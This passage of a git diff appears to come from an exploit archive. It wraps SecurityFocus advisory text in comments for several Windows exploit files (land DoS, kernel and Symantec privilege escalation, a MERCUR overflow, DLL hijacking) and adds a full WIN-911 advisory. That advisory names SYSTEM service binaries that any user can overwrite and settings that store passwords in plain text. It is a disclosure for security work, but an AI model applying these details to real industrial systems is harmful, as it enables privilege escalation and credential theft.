IOS devices & Catalyst switches, and HP-UX up to 11.00. @@ -5,6 +6,7 @@ A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. **Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. +*/ /* land.c by m3lt, FLC crashes a win95 box */ diff --git a/platforms/windows/dos/20814.c b/platforms/windows/dos/20814.c index 53deb71b6..54d65580a 100755 --- a/platforms/windows/dos/20814.c +++ b/platforms/windows/dos/20814.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. @@ -5,6 +6,8 @@ A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. **Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. +*/ + #define _BSD_SOURCE diff --git a/platforms/windows/dos/20949.c b/platforms/windows/dos/20949.c index 22d32339d..8bd7b06d1 100755 --- a/platforms/windows/dos/20949.c +++ b/platforms/windows/dos/20949.c @@ -1,10 +1,10 @@ -source: http://www.securityfocus.com/bid/2905/info +// source: http://www.securityfocus.com/bid/2905/info -1C: Arcadia Internet Store is a online shopping utility for Microsoft Windows NT/2000 that is fully integratable with 1C: Enterprise, another popular Russian web-commerce utility. +// 1C: Arcadia Internet Store is a online shopping utility for Microsoft Windows NT/2000 that is fully integratable with 1C: Enterprise, another popular Russian web-commerce utility. -One of the components of this package, 'tradecli.dll', allows users to specify a template file, the contents of which will be output. +// One of the components of this package, 'tradecli.dll', allows users to specify a template file, the contents of which will be output. -Remote attackers can request dos devices, such as 'con', 'com1', 'com2', etc. When 'tradecli.dll' attempts to open these files a denial of service may occur. +// Remote attackers can request dos devices, such as 'con', 'com1', 'com2', etc. When 'tradecli.dll' attempts to open these files a denial of service may occur. /* Proof of conecpt code by linux^sex diff --git a/platforms/windows/dos/31585.c b/platforms/windows/dos/31585.c index 8271ecfe9..5cbb21bdc 100755 --- a/platforms/windows/dos/31585.c +++ b/platforms/windows/dos/31585.c @@ -1,8 +1,11 @@ +/* source: http://www.securityfocus.com/bid/28554/info Microsoft Windows is prone to a local privilege-escalation vulnerability. The vulnerability resides in the Windows kernel. A locally logged-in user can exploit this issue to gain kernel-level access to the operating system. +*/ + #include #include diff --git a/platforms/windows/local/28763.c b/platforms/windows/local/28763.c index 057c10742..2200db4db 100755 --- a/platforms/windows/local/28763.c +++ b/platforms/windows/local/28763.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/20360/info Symantec AntiVirus is prone to a privilege-escalation vulnerability. @@ -5,6 +6,7 @@ Symantec AntiVirus is prone to a privilege-escalation vulnerability. Local attackers can exploit this issue to corrupt memory and execute arbitrary code with kernel-level privileges. Successful exploits may facilitate a complete system compromise. This issue affects only Symantec and Norton antivirus products running on Microsoft Windows NT, Windows 2000, and Windows XP. +*/ //////////////////////////////////// ///// Norton Internet Security diff --git a/platforms/windows/local/28764.c b/platforms/windows/local/28764.c index 67520d50f..201651ade 100755 --- a/platforms/windows/local/28764.c +++ b/platforms/windows/local/28764.c @@ -1,10 +1,10 @@ -source: http://www.securityfocus.com/bid/20360/info +// source: http://www.securityfocus.com/bid/20360/info -Symantec AntiVirus is prone to a privilege-escalation vulnerability. +// Symantec AntiVirus is prone to a privilege-escalation vulnerability. -Local attackers can exploit this issue to corrupt memory and execute arbitrary code with kernel-level privileges. Successful exploits may facilitate a complete system compromise. +// Local attackers can exploit this issue to corrupt memory and execute arbitrary code with kernel-level privileges. Successful exploits may facilitate a complete system compromise. -This issue affects only Symantec and Norton antivirus products running on Microsoft Windows NT, Windows 2000, and Windows XP. +// This issue affects only Symantec and Norton antivirus products running on Microsoft Windows NT, Windows 2000, and Windows XP. ///////////////////////////////////////////// ///// Norton Internet Security ///// diff --git a/platforms/windows/local/40340.txt b/platforms/windows/local/40340.txt new file mode 100755 index 000000000..599952e90 --- /dev/null +++ b/platforms/windows/local/40340.txt @@ -0,0 +1,91 @@ +Title: WIN-911 - Insecure File Permissions EoP +CWE Class: CWE-276: Incorrect Default Permissions +Date: 05/09/2016 +Vendor: Win911 +Product: WIN-911 +Type: Alarm Notification Software +Version: V7.17.00 +Download URL: through Rockwell Automation downloads: +http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?crumb=112 +Filter on "win-911", "software", "all families" +Tested on: Windows 7x86 EN +Release mode: no bugbounty program, public release + +- 1. Product Description: - +The most widely used alarm notification software for the automation industry. +WIN-911 is used by hundreds of Fortune 500 and Global 500 companies. + +- 2. Technical Details/PoC: - +This vulnerability allows attackers to escalate their privilege to system administrator +or SYSTEM on vulnerable installations of Win-911. +An attacker must have a valid user-account on the system. + +PoC 1: +The product is installed under "C:\Program Files\Specter Instruments\WIN-911 V7". +This directory allows EVERYONE to modify files within this location. + +Besides executables running with administrative privileges there are also various services binaries. +These all run as SYSTEM and might be overwritten to obtain SYSTEM level access: + +C:\Program Files\Specter Instruments\WIN-911 V7\Mobile-911 Bridge Inbound.exe +C:\Program Files\Specter Instruments\WIN-911 V7\Mobile-911 Bridge Outbound.exe +C:\Program Files\Specter Instruments\WIN-911 V7\viewLinc Bridge.exe + +PoC 2: +The web-server is installed as a separate component under: +"C:\Program Files\Specter Instruments\WEB-911 Services" +This directory allows EVERYONE full-control. +Once exploited, this could affect remote users connecting to the web-server. + +- 3. Mitigation: - +None. +If you are brave, edit the permissions. +Not sure how this impacts the application. + +- 4. Author: - +sh4d0wman + + +################################################################ + + +Title: WIN-911 - Credential Disclosure +CWE Class: CWE-276: Incorrect Default Permissions | CWE-256: Plaintext Storage of a Password +Date: 05/09/2016 +Vendor: Win911 +Product: WIN-911 +Type: Alarm Notification Software +Version: V7.17.00 +Download URL: through Rockwell Automation downloads: +http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?crumb=112 +Filter on "win-911", "software", "all families" +Tested on: Windows 7x86 EN +Release mode: no bugbounty program, public release + +- 1. Product Description: - +The most widely used alarm notification software for the automation industry. +WIN-911 is used by hundreds of Fortune 500 and Global 500 companies. + +- 2. Technical Details/PoC: - +This vulnerability allows attackers to obtain certain usernames and passwords on +vulnerable installations of Win-911. +An attacker must have a valid user-account on the system. + +The product is installed under "C:\Program Files\Specter Instruments\WIN-911 V7". +This directory allows EVERYONE to read and modify files within this location. + +During configuration an .ini file is populated with information. +Some of this information is sensitive. + +The following settings will log credentials in plain-text: +FIX Remote Alarm +ArchestrA Direct Connect +viewLinc Direct Connect +WIN911 Pager +E-mail POP and SMTP + +- 3. Mitigation: - +None yet. + +- 4. Author: - +sh4d0wman \ No newline at end of file diff --git a/platforms/windows/remote/21626.c b/platforms/windows/remote/21626.c index e48969b0a..bcf9640e6 100755 --- a/platforms/windows/remote/21626.c +++ b/platforms/windows/remote/21626.c @@ -1,6 +1,6 @@ -source: http://www.securityfocus.com/bid/5261/info +// source: http://www.securityfocus.com/bid/5261/info -MERCUR Mailserver is prone to a remotely exploitable buffer overflow condition. The condition is due to insufficient bounds checking in the Control-Service component, which listens on TCP port 32000 by default. It is possible to corrupt process memory by supplying an overly long username/password. Attackers may exploit this condition to execute arbitrary instructions with the privileges of the mailserver. +// MERCUR Mailserver is prone to a remotely exploitable buffer overflow condition. The condition is due to insufficient bounds checking in the Control-Service component, which listens on TCP port 32000 by default. It is possible to corrupt process memory by supplying an overly long username/password. Attackers may exploit this condition to execute arbitrary instructions with the privileges of the mailserver. /* mercrexp.c (7/16/2002) diff --git a/platforms/windows/remote/34848.c b/platforms/windows/remote/34848.c index 3de65b16d..723126954 100755 --- a/platforms/windows/remote/34848.c +++ b/platforms/windows/remote/34848.c @@ -1,10 +1,10 @@ -source: http://www.securityfocus.com/bid/44163/info +// source: http://www.securityfocus.com/bid/44163/info -1CLICK DVD Converter is prone to multiple vulnerabilities that let attackers execute arbitrary code. +// 1CLICK DVD Converter is prone to multiple vulnerabilities that let attackers execute arbitrary code. -An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. +// An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. -LG Software Innovation 1CLICK DVD Converter 2.1.7.1 is vulnerable; other versions may also be affected. +// LG Software Innovation 1CLICK DVD Converter 2.1.7.1 is vulnerable; other versions may also be affected. /* #One CLICK DVD Converter 2.1.7.1 DLL Hijacking Exploit (vsoscaler.dll ; swscale.dll ; dvd43.dll )